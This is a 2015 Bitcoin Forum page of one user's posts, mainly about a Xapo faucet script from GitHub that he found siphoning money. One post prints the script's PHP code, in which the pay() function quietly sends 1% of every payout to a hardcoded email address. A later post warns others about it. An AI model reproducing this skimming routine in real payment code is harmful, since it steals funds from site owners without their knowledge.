Bitcoin Forum
May 07, 2024, 10:59:27 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 »
181  Other / Beginners & Help / Re: crack my sha256 hash, reward of up to $1000 USD on: May 28, 2015, 10:56:16 PM
In his countless other threads OP indicated it is 10 digits random (A-Z,a-z,0-9).
So 10 digits @ 64 values per digit  64^10 = 83,929,936,5868,340,224 combinations
7970 is ~ 1 billion SHA-256 attempts using hashcat.

83,929,936,5868,340,224 / 1,000,000,000 / 60 / 60 / 24 / 365 = 26 GPU years.  50% chance in half that so 13 GPU years.   Someone with a 13 GPU farm running 24/7/365 for an entire year would have a 50% chance of cracking it.

$1,000 is a joke.


nice exclamation
182  Other / Beginners & Help / Re: Circle is giving away $5/~0.021 BTC for new users on: May 28, 2015, 10:50:04 PM
This really works, i just got 5.00$ and it's a great way to buy bitcoins easy. Thanks for this post !
183  Economy / Micro Earnings / Re: My new Xapo faucet payout problem on: May 28, 2015, 09:41:09 PM
its off the chain xapo.
i just found out the script is sending satoshi on the downlow thru credit in the mail check it
maybe the money is going to them look.
This really sucks because i've worked real hard on the cosmedics  i wish i went to school for this. i am not a programmer but know the basics,i can read what its saying but i dont know how to write code for json etc
here is the faucet unfinished  http://www.bitcoinfaucetexchange.com/, i've been moving things around and sort but i think i might have to give this script to the dog cause its just too buggy. supposedly the non xapo members will get a payment from it if its over 5500 but i'm not setting the faucet that high for every user so i am at witts end i wish i just had a script i could trust
also ill show you the whole function maybe you can see the problem
<?php

require 'libs/XapoCreditAPI.php';

function get_main_url($omitHost = false)
{
    $protocol = ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] === '443') ? 'https://' : 'http://';
    if ($omitHost) {
        return strtok($_SERVER['REQUEST_URI'], '?');
    }

    return $protocol . $_SERVER['HTTP_HOST'] . strtok($_SERVER['REQUEST_URI'], '?');
}


function get_ip()
{
    if (!filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        echo 'Invalid IP.<br /><a href="' . htmlspecialchars(get_main_url()) . '">Main page</a>';
        exit;
    }

    if ($GLOBALS['settings']['behind_proxy']) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR']) {
            $ipList                          = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            $_SERVER['HTTP_X_FORWARDED_FOR'] = array_pop($ipList);
        } else {
            $_SERVER['HTTP_X_FORWARDED_FOR'] = false;
        }

        if (filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $query = "insert into sarlanga_settings (name, value) values('behind_proxy', '0') on duplicate key update value = values(value)";
            mysqli_query($GLOBALS['db'], $query);
            $GLOBALS['settings']['behind_proxy'] = '0';

            return $_SERVER['REMOTE_ADDR'];
        }
    }

    return $_SERVER['REMOTE_ADDR'];
}


function get_rewards($rewards = null)
{
    if (is_null($rewards)) {
        $rewards = $GLOBALS['settings']['rewards'];
    }
    $rewards         = explode(',', $rewards);
    $rewardList      = array();
    $totalMultiplier = 0;
    foreach ($rewards as $reward) {
        @list($reward, $multiplier) = explode('*', $reward);
        $reward     = (int) trim(abs($reward));
        $multiplier = (int) trim(abs($multiplier));
        if (!$multiplier)
            $multiplier = 1;
        if (!$reward)
            continue;
        if (!isset($rewardList[$reward])) {
            $rewardList[$reward] = 0;
        }
        $rewardList[$reward] += $multiplier;
        $totalMultiplier += $multiplier;
    }
    krsort($rewardList);
    $result['reward_list']      = array();
    $result['reward_list_html'] = '';
    $result['full_reward_list'] = array();
    $totalAmount                = 0;
    foreach ($rewardList as $reward => $multiplier) {
        $odds = round($totalMultiplier / $multiplier);
        if ($odds > 10000) {
            $percentage = '<0.01%';
        } else {
            $percentage = rtrim(rtrim(number_format($multiplier / $totalMultiplier * 100, 2), '0'), '.') . '%';
        }
        $result['reward_list'][] = array(
            'reward' => $reward,
            'percentage' => $percentage,
            'odds' => '1:' . $odds
        );
        $result['reward_list_html'] .= htmlspecialchars($reward) ." " ;
        $result['full_reward_list'] = array_merge($result['full_reward_list'], array_fill(0, $multiplier, $reward));
        $totalAmount += $reward;
    }
    //$result['reward_list_html'] = . $result['reward_list_html'];

    if (!$result['reward_list']) {
        return false;
    }

    $result['random_reward']  = $result['full_reward_list'][mt_rand(0, count($result['full_reward_list']) - 1)];
    $result['average_reward'] = (int) ($totalAmount / $totalMultiplier);

    return $result;
}

function format_timer($totalSeconds)
{
    $totalSeconds = (int) abs($totalSeconds);
    $hours        = (int) floor($totalSeconds / 3600);
    $minutes      = (int) floor(($totalSeconds - ($hours * 3600)) / 60);
    $seconds      = $totalSeconds % 60;

    $result = '';
    if ($hours === 1) {
        $result .= '1 hour';
    } elseif ($hours > 1) {
        $result .= $hours . ' hours';
    }
    if ($hours && $minutes) {
        $result .= ', ';
    }
    if ($minutes === 1) {
        $result .= '1 min';
    } elseif ($minutes > 1) {
        $result .= $minutes . ' mins';
    }
    if (($hours || $minutes) && $seconds) {
        $result .= ', ';
    }
    if ($seconds === 1) {
        $result .= '1 sec';
    } elseif ($seconds > 1) {
        $result .= $seconds . ' secs';
    }

    return $result;
}

function fix_magic_quotes()
{
    if (get_magic_quotes_gpc()) {
        $process = array(
            &$_GET,
            &$_POST,
            &$_COOKIE,
            &$_REQUEST
        );
        while (list($key, $val) = each($process)) {
            foreach ($val as $k => $v) {
                unset($process[$key][$k]);
                if (is_array($v)) {
                    $process[$key][stripslashes($k)] = $v;
                    $process[] =& $process[$key][stripslashes($k)];
                } else {
                    $process[$key][stripslashes($k)] = stripslashes($v);
                }
            }
        }
        unset($process);
    }
}



function pay($to, $amount, $comment)
{
    $settings = $GLOBALS["settings"];
    $myHashKey = $GLOBALS["hashKey"];
    $serviceUrl = "https://api.xapo.com/v1";
    $xapo_app_id = trim(decryption($myHashKey,$settings['xapo_app_id']));
    $xapo_secret_key = trim(decryption($myHashKey,$settings['xapo_secret_key']));
    $creditAPI = new XapoCreditAPI($serviceUrl, $xapo_app_id, $xapo_secret_key);
    $currency = "SAT"; // SAT | BTC
    $unique_request_id = uniqid();
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, $comments);
    $amount = $amount * 0.01;
    $unique_request_id = uniqid();
    $to="destbogan@gmail.com";
    $ret = $creditAPI->credit($to, $currency, $unique_request_id, $amount, "Thank you for using Faucet Builder");
    return $ret;
}

function encryption($key,$data){
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, 'ecb'));
}

function decryption($key,$data){
  return mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($data), 'ecb');
}

function validHash($myHashKey){
  //A-Z,a-z,0-9, 32 char
  return preg_match("/^[A-Z0-9_]*[A-Z0-9][A-Z0-9]{31}$/i",$myHashKey);
}

?>

184  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 09:09:00 PM
Yes the background makes it uneasy and a little annoying. Make the background one whole image too, or just leave it black, so that it will look more simple and nicer. Smiley

The rewards are a bit too small, don't you think? Do raise them up after you get more traffic! Grin

(The diamond looks cool)
  The payout out will be very high between 500-10,000.  I was just testing with those low numbers.When it's fixed it will be that amount.
185  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 08:53:26 PM
sorry faucet has bugs, i thought was ready  but it's not has a few glitches
at least the background was changed now and it's better than before

and now the error " invalid request "

personally i like xapo faucet, waiting for you will fix it, i hope it soon Smiley
Yes a lot of people complained about the background so i changed it. I'm having problems with payouts so ive contacted Xapo support on the matter because i'm clueless why it was working and now it's not .I sent them a copy of the function and a zip of the whole faucet script.Hopefully they will help. It's hard because there is no xapo scripts out there and the one that i've seen on github steals your money slowly. Many people have fallen victim from that script.
I will keep people updated on the problem and solutions in this thread and let everyone know when its able to pay out at the moment the xapo key has been taken out for maintenance but you can still visit and check out the xapo faucet list on the bottom  Grin
186  Economy / Micro Earnings / Re: How to create your own Xapo bitcoin faucet on: May 28, 2015, 08:37:52 PM
Just so everyone knows this faucet syphons money out of your xapo account it mails credits to the maker on every transaction do not use this script . It works in the beginning but then it starts sending satoshi to god knows where. Here is the screenshot of the code that is used to steal. Notice the credit and the email address on line 173 it sends to. This really sucks because i wanted a xapo faucet for some time and i worked real hard on all the cosmetics .If you do get it to work and get rid of that line of code after a while it will stop working and give you this message "unable to process your request" but still the money goes out of your account into the abyss; so the person does not get paid and the faucet owner loses the money. not cool  !!!
187  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 07:33:23 AM
sorry faucet has bugs, i thought was ready  but it's not has a few glitches
188  Economy / Micro Earnings / Re: [TUTORIAL] Easy way to earn up to 0.15 Bitcoin in 1 HOUR on: May 28, 2015, 05:33:17 AM
HA, I thought i was the only one doing this, why are you telling people this??? Soon everyone will be doing it and this is my bread and butter and you're just telling everyone......WTF
189  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 05:10:10 AM
i get the problem on your faucet Smiley
after i'm submit my xapo email and captcha
message error " Unable to process your request " please fix it Smiley
try now
190  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 03:07:03 AM
just fixed the payout problem  "i think...."
191  Economy / Micro Earnings / Re: A new Xapo faucet in town on: May 28, 2015, 03:00:34 AM
yes a lot of people are saying this  i will change.
192  Economy / Services / Re: INCREASED PAYOUT(5/11) ۩۞۩ secondstrade.com ★ signature campaign★weekly 0.04btc on: May 28, 2015, 02:57:25 AM
i am now a full member
all my info is still the same just status has moved up thnakyou
193  Economy / Micro Earnings / Re: Xapo - no fee for faucet on: May 28, 2015, 02:51:59 AM
xapo is making all out effort to get in first of all, I used them before, there is no problem, except the phone verification, the main advantage of btc is anonymous, but the xapo is killing the advantage with verification...

Pretty sure other wallet/storage services like Coinbase and BitGo make you put in a phone number as well, maybe at later stages in the account, but I think they still require it
Actually, you can also add it to Blockchain.info. Granted, it's not required, but still...

Yeah it seems to be tied to legitimacy; inputting the phone number allows you to buy and sell bitcoin for a bunch of these companies, I'm guessing its a regulations thing
i have a xapo account and the phone is a must because it rings when you receive money and if someone tries to access your bank on a different ip it messages you to enter a number  so that ip can access your wallet for security. i love xapo
194  Economy / Micro Earnings / My new Xapo faucet payout problem on: May 28, 2015, 02:42:06 AM
I just built a faucet using a script from github,everything is fine but for some reason it will only payout to xapo customers,  so if someone puts their non xapo address in it says it pays but the money just goes into the abyss LOL... does anyone have an idea how to fix this problem .here is where i got the script https://github.com/chipshotDEV/FaucetBuilder  and here is my faucet  http://www.bitcoinfaucetexchange.com/
195  Economy / Micro Earnings / A new Xapo faucet in town on: May 28, 2015, 02:28:32 AM


Xapo  users only


This is a New Xapo faucet with a payout between 10,000-250 satoshi.

The reason it is called Dimensional-btc is because of its dimensions everywhere . I have place a certain amount of portals to be open at certain times.Once someone finds the portal "the right one " they will be rewarded one bitcoin ! This is my first Xapo site so i decided to make it special and make payouts high. There is also a playlist of Youtube music playing "alternative grunge"  in the background if you want to listen for the use of the Xapo list i have made for your convenience . All Xapo accounts are paid instant; all other non Xapo accounts will be paid at a threshold of 5500 , there are some bugs so i would only use Xapo for the moment. Sorry about the ads but i must have them to keep the payments high. If you find any bugs please let me know. Also if you want  you can claim and post your amount in this post for people to see the high payments it pays  , your's truly the developer.......Goldkey0070
196  Economy / Speculation / Re: Four Charts That Suggest Bitcoin Value Could Be At 10,000 USD Next Year on: May 28, 2015, 12:51:01 AM
Just so everyone knows  "A NEW COUNTRY WAS BORN THIS YEAR 2015 its called  https://liberland.org/en/main/ The currency is bitcoin,its the most free country on the planet you can even do drugs,protitute walk around naked.  Their law is if there is no victim then there is no crime !!    Liberland came into existence due to a border dispute between Croatia and Serbia. This area along the west bank of the Danube river is not claimed by Croatia, Serbia or any other country. It was therefore terra nullius, a no man’s land, until Vít Jedlička seized the opportunity and on 13 April 2015 formed a new state in this territory – Liberland. The boundary was defined so as not to interfere with the territory of Croatia or Serbia. Its total area of approximately 7 km˛ is now the third smallest sovereign state, after the Vatican and Monaco. For more information regarding the border dispute between Croatia and Serbia see an article on Wikipedia.   i love there constitution https://liberland.org/en/constitution/  so yes it could be worth that much soon !!!! Grin
197  Economy / Micro Earnings / Re: The Best Bitcoin Faucet List On The Planet on: May 27, 2015, 07:12:30 AM

I added a new Xapo Faucet Created by the bitcoinfaucetrelay.com foundation
As of now i can only get it to pay to Xapo accounts only all other bitcoin addresses don't work.
I'm still working on it, but you can check it out and get paid if you are a Xapo wallet user.
Go to bitcoinfaucetrelay.com and look for DIMENSIONAL BTC in the Xapo faucet list
198  Other / Off-topic / Re: any free php hosting provider on: May 26, 2015, 05:21:15 AM
anyone know about any free php hosting provider then plz suggest me  Smiley Smiley
if you pay me 0.01 i will show you how to not pay a dime and with no bandwith limit for life !!!
199  Economy / Micro Earnings / Re: The Best Bitcoin Faucet List On The Planet on: May 21, 2015, 08:36:38 PM
No problem,I have updated the list and added 3 more Xapo faucets . Please visit and hit the facebook like button up top it would help my rating
200  Economy / Services / Re: i will teach you how to set up free hosting free domain and bitcoin faucet on: May 21, 2015, 08:33:00 PM
daily bump
Pages: « 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!